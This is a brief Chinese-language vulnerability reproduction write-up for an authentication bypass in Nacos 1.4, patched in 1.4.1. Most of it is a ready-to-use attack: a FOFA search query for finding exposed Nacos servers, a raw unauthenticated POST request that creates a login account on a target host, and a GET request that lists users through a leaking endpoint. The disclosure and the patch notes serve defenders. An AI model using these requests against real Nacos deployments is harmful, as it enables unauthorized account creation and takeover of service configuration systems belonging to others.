Nacos 認證繞過

Nacos 介紹

Nacos 致力於幫助您發現、配置和管理微服務。Nacos 提供了一組簡單易用的特性集，幫助您快速實現動態服務發現、服務配置、服務元數據及流量管理。Nacos 幫助您更敏捷和容易地構建、交付和管理微服務平台。 Nacos 是構建以“服務”為中心的現代應用架構 (例如微服務范式、雲原生范式) 的服務基礎設施。

 

漏洞成因：

1、未授權訪問接口，可以創建登錄用戶 

2、嚴格意義上來說，還有一個接口，屬於敏感信息泄露漏洞

漏洞影響：

1.4版本

漏洞復現：

FOFA語法：title="nacos"

 

 

通過未授權接口創建用戶

POST /v1/auth/users?username=test&password=test123 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

 

 

通過信息泄漏的接口查詢用戶是否創建成功

GET /v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 47.108.000.000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: https://47.108.000.000
Connection: close
Referer: https://47.108.000.000/

 

 

漏洞驗證

使用創建的系統登錄系統

 

 

漏洞補丁：

1.4.1 官網已經修復了該漏洞。